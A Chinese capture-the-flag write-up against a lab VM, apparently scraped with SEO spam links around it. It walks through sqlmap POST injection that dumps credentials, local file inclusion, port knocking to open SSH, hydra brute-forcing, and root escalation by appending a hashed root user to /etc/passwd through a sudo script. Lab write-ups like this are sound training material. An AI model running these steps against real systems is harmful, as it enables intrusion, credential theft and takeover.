当前位置: 首页 > news >正文

怎么用家里的电脑做网站服务器百度投诉中心人工电话

怎么用家里的电脑做网站服务器,百度投诉中心人工电话,宇宙设计网站推荐,黄冈seo攻击机192.168.223.128 靶机192.168.223.138 主机发现 nmap -sP 192.168.223.0/24 端口扫描 nmap -sV -p- -A 192.168.223.138 开启了22 80端口 访问一下web页面 有个查询界面 测试发现存在post型的sql注入 用sqlmap跑一下#xff0c;因为是post型的#xff0c;这里…攻击机192.168.223.128 靶机192.168.223.138 主机发现 nmap -sP 192.168.223.0/24 端口扫描 nmap -sV -p- -A 192.168.223.138 开启了22 80端口 访问一下web页面 有个查询界面 测试发现存在post型的sql注入 用sqlmap跑一下因为是post型的这里加一个post的data sqlmap -u http://192.168.223.138/results.php --data search1 --dbs 爆库 三个库看一下users的 sqlmap -u http://192.168.223.138/results.php --data search1 --tables -D users --batch只有一个表 看一下字段 sqlmap -u http://192.168.223.138/results.php --data search1 --columns -D users -T UserDetails --batch有账号密码 看一下账号密码 sqlmap -u http://192.168.223.138/results.php --data search1 -C username,password -D users -T UserDetails --dump账号密码都爆出来了登录一下 等一下这个管理员的账号,md登不上去0.0 测试了其他账号密码也登不上去我淦 还有一个库没看Staff sqlmap -u http://192.168.223.138/results.php --data search1 --tables -D Staff --batch爆表 也有个Users sqlmap -u http://192.168.223.138/results.php --data search1 --columns -D Staff -T Users --batch爆字段 有账号密码 sqlmap -u http://192.168.223.138/results.php --data search1 -C Username,Password -D Staff -T Users --dump --batchadmin 856f5de590ef37314e7c3bdf6f8a66dc 密码用md5解密看看 密码是transorbital1 成功登录 注意下面显示 可能有文件包含 用bp抓包看看 并没有什么参数根据前面有个靶机的经验文件包含的参数名可能是file 测试一下 成功LFI BUT,后面不会了尝试了ssh连接也无果。 看了别人wp后才知道靶机开启了knockd服务 搜索了一下相关知识 在第一步信息收集的时候22端口其实状态是被过滤的我忽略了这一点 重新看一下也验证了靶机开启了knockd服务 看一下配置文件,默认配置文件在/etc/knockd.conf 其中7469,8475,9842 就是我们敲门的端口序列 用nmap依次访问22端口就会开启 nmap -p 7469 192.168.223.138 nmap -p 8475 192.168.223.138 nmap -p 9842 192.168.223.138在扫一下端口看看22端口开没开 这里看到22端口已经开启了 那么应该就可以用ssh连接了 为了方便把之前获得的账号和密码分别放入两个txt文档用hydra爆破一下省手输入了 hydra -L users.txt -P password.txt ssh://192.168.223.138爆出来三组账号密码 login: chandlerb password: UrAG0D! login: joeyt password: Passw0rd login: janitor password: Ilovepeepee ssh chandlerb192.168.223.138 ssh joeyt192.168.223.138 ssh janitor192.168.223.138先登第一个看看空的 看第二个也是空的 看第三个,也是空的 我擦 难道是隐藏了 ls -a 看一下 看到janitor账户多一个文件 打开发现里面有个密码文件 可能是其他账户密码加到字典里再爆破一次 多爆破出来一组fredflogin: fredf password: B4-Tru3-001 我最初怀疑的管理员管理员总应该有点root权限吧 sudo -l 看一下 果然有一个免密rooot 打开这个文件看一下 好多编译文件不知道如何利用看看上一级test.py是什么东西 是一个文件读写的脚本读取第一个参数文件的内容写入到第二个参数文件里 可以利用这个脚本写一个有root权限的用户到/etc/passwd就可以提权了 先来到tmp目录写一个免密的root echo ttao::0:0:root:/bin/bash /tmp/mr然后执行test sudo ./test /tmp/mr /etc/passwd发现不太行可能是文件权限稳定暂时没搞懂 那就弄个加密的root 用openssl加盐 openssl passwd -1 -salt xt xt1 1 1xt$Mpdxuy7oTO65ufaQVL4zS1 echo echo xt:$1$xt$Mpdxuy7oTO65ufaQVL4zS1:0:0:root:/bin/bash /tmp/xt/tmp/xtsudo ./test /tmp/xt /etc/passwdsu xt 成功拿下flag。 1.sql注入2.LFI本地包含3.knockd敲门服务4.ssh连接5.hyrdra爆破6.ls -a读取隐藏文件7.openssl生成加盐密码8.写入root权限用户
http://www.pierceye.com/news/39359/

相关文章:

  • 漳州企业网站建设制作新手怎么推广自己的店铺
  • 个人备案网站可以做淘宝客网站建设需要度搜去
  • 网站建设及空间考研哪个培训机构比较好
  • 南京太阳宫网站建设佛山网站建设招标
  • 网站开发游戏程序开发二次元动漫网站设计方案
  • 最常见企业网站公司有哪些做坑网站需要
  • 惠阳有做公司网站的吗最好设计网站建设
  • 网站制作:网推宝|百度比较公司网站与营销网站的不同
  • 网站建设 义乌北京市建设集团有限公司
  • 百度网站抓取一件代发应该在哪个网站上做
  • app介绍类网站模板做投标网站条件
  • 宁波网站建设公司哪里有一级网站建设
  • 网站版面特点做网站可以赚钱嘛
  • 网站建设需求表模板做网站违法吗
  • 网站无域名注册人id电视台网站建设
  • 深圳专业网站建设公深圳龙岗区住房和建设局网站官网
  • 北京网站优化技术网站制作留钱
  • 公司网站服务器选择发果怎么做视频网站
  • 怎么可以上传自己做的网站网络系统运维
  • 线上注册公司是在哪个网站专业网站制作推荐
  • 网站开发环境与工具企业网站优化方案
  • 专门做调查问卷的网站深圳宝安区区号
  • 建设营销型网站服务wordpress sns主题
  • 建设通招标网站购买一个网站需要多少钱?
  • 南昌网站推广贵州省城乡和住房建设厅网站首页
  • 如何做网站动态图标深圳市seo网站设计
  • 网站建设合理性关键词搜索排名怎么查看
  • 广州网站设计易企建站做一个平台网站的预算
  • 网站生成移动版目前网站开发有什么缺点
  • 左侧 导航 网站网页设计 网站开发 网络安全